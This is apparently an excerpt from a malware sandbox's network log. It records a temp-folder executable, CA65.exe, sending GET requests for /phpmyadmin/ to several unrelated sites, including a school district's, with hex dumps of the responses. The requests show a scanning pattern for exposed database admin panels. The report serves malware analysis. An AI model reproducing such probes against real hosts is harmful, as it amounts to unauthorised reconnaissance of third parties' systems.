2023-12-22 20:14:53 UTC	597	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-Result-Reason: Not Redirected X-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404 X-UA-Compatible: IE=edge Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly Set-Cookie: __RequestVerificationToken=fMiA5tcyD4XacpqHTMHDGq6GOgdcULJnhfgwH-ng2EuQkcyb1Dq60KzsEbKFua2ZCQLBtA2; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:14:53 GMT Connection: close Content-Length: 33332
2023-12-22 20:14:53 UTC	15787	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 46 43 36 36 47 35 43 43 37 50 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 Data Ascii: <!DOCTYPE html><html lang="en-US"><head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-FC66G5CC7P"></script><script> w
2023-12-22 20:14:53 UTC	16384	IN	Data Raw: 6c 65 43 6f 6e 74 65 6e 74 20 4d 6f 64 32 73 78 63 61 70 70 43 22 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 63 2d 63 6f 6e 74 65 6e 74 2d 62 6c 6f 63 6b 27 20 20 64 61 74 61 2d 63 62 2d 69 6e 73 74 61 6e 63 65 3d 27 37 30 36 27 20 64 61 74 61 2d 63 62 2d 69 64 3d 27 37 30 36 27 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 6d 79 2d 36 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 36 20 63 6f 6c 2d 6c 67 2d 33 20 74 65 78 74 2d 63 65 6e 74 65 72 20 6d 62 2d 35 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 Data Ascii: leContent Mod2sxcappC"><div class='sc-content-block' data-cb-instance='706' data-cb-id='706'><div class="container my-6"> <div class="row"> <div class="col-sm-6 col-lg-3 text-center mb-5 d-flex flex-column align-items-center">
2023-12-22 20:14:53 UTC	1161	IN	Data Raw: 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 73 6c 69 6d 6d 65 6e 75 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 6c 6c 69 70 73 69 73 2e 6d 69 6e 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 Data Ascii: ?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.slimmenu.js?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.ellipsis.min.js?cdv=109" typ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	57619	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	329	OUT	GET /phpmyadmin/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_GEnBzdvcWKhDU868mmO49H7BiHA8bCvAsPg5KvpLBVs+9wEBB7dt8RKV+6YtbupljEymJQuoWgouUsuAYll8vQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:53 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	57682	104.17.166.123	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	403	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=36ce27554c1b5fa0a3332a6f3933e64f08535353-1703276091; __cf_bm=Mr7liE5R.aLYKQbeRzXeBQtbVe4Y_ihQqrSFn.H1rMw-1703276091-1-AeA1g101VbceZhpcHFMIiLxSDosHM4U3kUoUGhUr84Y19L6SpxWeNOPXAgFDz8DdogFzkLwsqTh8mVyq+jr0wvI= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	733	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 839b089f0c65d9e5-MIA CF-Cache-Status: MISS Cache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15 Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Security-Policy: Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Request-Id: 46617c93-e31b-4477-b018-9c981ec1d827 X-Runtime: 0.559898 X-Xss-Protection: 1; mode=block Server: cloudflare alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:54 UTC	636	IN	Data Raw: 63 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 74 2d 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 4c 69 62 65 72 74 79 20 45 6c 65 6d 65 6e 74 61 72 79 20 53 63 68 6f 6f 6c 20 44 69 73 74 72 69 63 74 3c Data Ascii: c93<!DOCTYPE html>...[if lte IE 8]> <html lang="en-US" class="lt-ie9"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head><meta charset="utf-8"><title>404 - Page Not Found - Liberty Elementary School District<
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 66 20 28 77 69 6e 64 6f 77 2e 67 61 29 20 7b 0a 09 09 09 09 09 09 09 09 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 67 61 54 65 73 74 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 31 39 39 31 39 33 37 37 31 2d 31 27 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 27 2f 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 27 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 2c 20 31 30 29 3b 0a 09 09 09 09 09 7d 29 28 29 3b 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d Data Ascii: f (window.ga) {clearInterval(gaTest);ga('create', 'UA-199193771-1');ga('send', 'pageview', '/Page Not Found/www.liberty25.org/phpmyadmin/');}}, 10);})();</script><script>(function(w,d,s,l,i){w[l]
2023-12-22 20:14:54 UTC	1221	IN	Data Raw: 09 0a 0a 09 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2e 63 66 6d 3f 62 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 09 3c 73 74 79 6c 65 20 69 64 3d 22 66 73 48 53 4c 43 6f 6c 6f 72 73 22 3e 0a 09 09 09 3a 72 6f 6f 74 20 7b 0a 09 09 09 7d 0a 09 09 3c 2f 73 74 79 6c 65 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 75 70 6c 6f 61 64 65 64 2f 74 68 65 6d 65 73 2f 70 6f 6d 66 72 65 74 5f 76 35 2f 6d 61 69 6e 2e 63 73 73 3f 31 36 33 38 35 36 33 34 36 35 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 Data Ascii: <link href="/styles.cfm?b" media="screen" rel="stylesheet"><style id="fsHSLColors">:root {}</style><link rel="stylesheet" media="all" href="/uploaded/themes/pomfret_v5/main.css?1638563465" /><link rel="stylesheet" media="all"
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 28 66 75 6e 63 74 69 6f 6e 28 77 69 6e 64 6f 77 29 20 7b 0a 09 09 09 77 69 6e 64 6f 77 2e 46 53 2e 63 75 72 72 65 6e 74 50 61 67 65 20 3d 20 7b 0a 09 09 09 09 64 61 74 65 46 6f 72 6d 61 74 3a 20 27 6d 64 27 2c 0a 09 09 09 09 68 6f 6d 65 70 61 67 65 56 69 64 65 6f 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 3a 20 74 72 75 65 2c 0a 09 09 09 09 74 69 6d 65 46 6f 72 6d 61 74 3a 20 27 31 32 27 0a 09 09 09 7d 3b 0a 09 09 09 63 6f 6e 73 74 20 73 65 74 74 69 6e 67 73 20 3d 20 46 53 2e 67 65 74 4e 53 28 27 73 65 74 74 69 6e 67 73 27 29 3b 0a 09 09 09 73 65 74 74 69 6e 67 73 2e 73 74 79 6c 65 4d 61 6e 61 67 65 72 45 6e 61 62 6c 65 64 20 3d 20 66 61 6c 73 Data Ascii: 7ffa<script type="text/javascript">(function(window) {window.FS.currentPage = {dateFormat: 'md',homepageVideoOptimization: true,timeFormat: '12'};const settings = FS.getNS('settings');settings.styleManagerEnabled = fals
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 61 73 2d 73 65 61 72 63 68 2d 63 6f 6e 74 61 69 6e 65 72 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 31 30 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 20 66 73 45 6d 62 65 64 20 6f 66 66 63 61 6e 76 61 73 2d 73 65 61 72 63 68 2d 62 75 74 74 6f 6e 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 31 31 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d Data Ascii: as-search-container" id="fsEl_2010" data-use-new="true" ><div class="fsElementContent" ><div class="fsElement fsEmbed offcanvas-search-button" id="fsEl_2011" data-use-new="true" ><div class="fsElementContent" > <button class="search-
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 73 65 61 72 63 68 2d 72 65 73 75 6c 74 73 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 6e 6f 76 61 6c 69 64 61 74 65 3d 22 6e 6f 76 61 6c 69 64 61 74 65 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 66 73 46 69 65 6c 64 4c 61 62 65 6c 22 20 66 6f 72 3d 22 66 73 53 65 61 72 63 68 49 6e 70 75 74 5f 32 33 31 36 22 3e 53 65 61 72 63 68 3c 2f 6c 61 62 65 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 53 65 61 72 63 68 45 6c 65 6d 65 6e 74 4b 65 79 77 6f 72 64 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 66 73 53 74 79 6c 65 53 65 61 72 63 68 46 69 65 6c 64 20 66 73 53 74 79 6c 65 44 65 66 61 75 6c 74 46 69 65 6c 64 22 20 69 64 3d 22 66 73 53 65 61 72 63 68 49 6e 70 75 74 5f 32 33 31 36 22 20 6e 61 Data Ascii: /www.liberty25.org/search-results" method="get" novalidate="novalidate"><label class="fsFieldLabel" for="fsSearchInput_2316">Search</label><div class="fsSearchElementKeyword"><input class="fsStyleSearchField fsStyleDefaultField" id="fsSearchInput_2316" na
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 65 73 22 3e 44 69 73 74 72 69 63 74 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 33 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 61 74 68 6c 65 74 69 63 73 2d 61 6e 64 2d 61 63 74 69 76 69 74 69 65 73 22 3e 41 74 68 6c 65 74 69 63 73 20 26 61 6d 70 3b 20 41 63 74 69 76 69 74 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 62 75 Data Ascii: es">District Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel3"><li><a href="/about-liberty/district-services/athletics-and-activities">Athletics & Activities</a></li><li class="fsNavParentPage"><a href="/about-liberty/district-services/bu
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 22 3e 48 65 61 6c 74 68 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 34 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 2f 69 6c 6c 6e 65 73 73 2d 61 6e 64 2d 61 74 74 65 6e 64 61 6e 63 65 22 3e 49 6c 6c 6e 65 73 73 20 61 6e 64 Data Ascii: ><li class="fsNavParentPage"><a href="/about-liberty/district-services/health-services">Health Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel4"><li><a href="/about-liberty/district-services/health-services/illness-and-attendance">Illness and
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 67 72 61 6e 74 20 45 64 75 63 61 74 69 6f 6e 20 50 72 6f 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 73 65 63 74 69 6f 6e 2d 35 30 34 22 3e 53 65 63 74 69 6f 6e 20 35 30 34 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 65 64 75 63 61 74 69 6f 6e 22 3e 53 70 65 63 69 61 6c 20 45 64 75 63 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 Data Ascii: grant Education Program</a></li><li><a href="/about-liberty/district-services/special-services/section-504">Section 504</a></li><li><a href="/about-liberty/district-services/special-services/special-education">Special Education</a></li></ul></div></li><li
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 72 74 79 2f 73 74 72 61 74 65 67 69 63 2d 70 6c 61 6e 22 3e 53 74 72 61 74 65 67 69 63 20 50 6c 61 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 73 75 70 65 72 69 6e 74 65 6e 64 65 6e 74 73 2d 6f 66 66 69 63 65 22 3e 53 75 70 65 72 69 6e 74 65 6e 64 65 6e 74 e2 80 99 73 20 4f 66 66 69 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 65 61 72 6e 69 6e 67 22 3e 4c 65 61 72 6e 69 6e 67 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 32 22 Data Ascii: rty/strategic-plan">Strategic Plan</a></li><li><a href="/about-liberty/superintendents-office">Superintendents Office</a></li></ul></div></li><li class="fsNavParentPage"><a href="/learning">Learning</a><div class="fsNavPageInfo"><ul class="fsNavLevel2"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	57978	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	327	OUT	GET /phpmyadmin/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_gj9TE5H0bBFtZVPMzosSUgvbqcP9jOzwf/4a6qSbU/RYiuzEtrlvjPKxgAbj+0XrstfpRb5uTmKnY0i8nKA//Q Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:53 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	56696	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	199	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	802	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:14:53 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:14:53 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F81p5yZUsQvFo6PTRMUonCi2G%2B6sRM58rx%2BcaQwL%2FRWVwSILmWGdayqGa1IimY7lOOaOcXJFCmsE69z6uMutPexf0%2FLvZSXT1OJrGI1M1RAEG4bsuL9x9l379JOGArh4O49GN%2BU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b089f684a8dd3-MIA
